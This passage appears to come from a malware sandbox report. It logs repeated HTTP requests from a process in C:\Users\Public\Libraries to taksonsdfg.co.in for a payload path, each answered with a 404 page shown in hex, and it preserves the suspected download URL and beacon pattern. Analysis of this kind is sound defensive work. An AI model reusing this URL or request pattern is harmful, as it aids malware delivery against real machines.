                                                                                    2024-10-14 02:30:39 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:39 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.2.450107108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:40 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:40 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:40 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:40 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:40 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.2.450114108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:41 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:41 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:41 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:41 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:41 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.2.450126108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:42 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:42 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:42 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:42 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:42 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.2.450133108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:43 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:44 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:44 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:44 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:44 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.2.450145108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:45 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:45 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:45 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:45 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:45 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.2.450153108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:46 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:46 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:46 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:46 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:46 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.2.450160108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:47 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:47 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:47 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:47 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
